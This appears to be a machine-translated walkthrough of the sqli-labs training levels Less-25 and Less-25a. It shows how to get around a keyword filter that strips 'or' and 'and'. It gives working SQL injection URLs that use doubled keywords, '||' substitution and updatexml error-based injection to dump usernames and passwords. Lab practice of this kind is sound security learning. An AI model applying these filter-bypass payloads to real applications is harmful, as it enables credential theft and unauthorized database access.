less-25
Front basics: the later stages involved WAF bypass:
There are three main ways: white box bypass, bypassing the black box, Fuzz Test
Online sql injection WAF bypass the tutorial there are many, you can own inquiries, in short, is anyone else thinking wretched
According to the first 25 off the following tips and code, we find that he escaped or and and (not case sensitive) became spaces
The first approach:
Dual-write mode
Here direct the final step, and steps are the same: http: //192.168.5.100/sqli-labs/Less-25/ id = 0 'union select 1,2, group_concat (concat_ws (' - ', username,? passwoorrd)) from security.users - + (Note that password in double or written)
The second method: or-> || based error injection
http://192.168.5.100/sqli-labs/Less-25/?id=0' || updatexml(1,concat(0x7e,(select schema_name from infoorrmation_schema.schemata limit 0,1),0x7e),1)--+
Traversing broke all the data, you can continue to use, it can not be used here group_concat (), because the data is incomplete
less-25a
By observation, it has an upper 'package, the package without any clearance, and also an escape or and and
:http://192.168.5.100/sqli-labs/Less-25a/?id=-1 union select 1,2,group_concat(concat_ws(0x7e,username,passwoorrd)) from security.users--+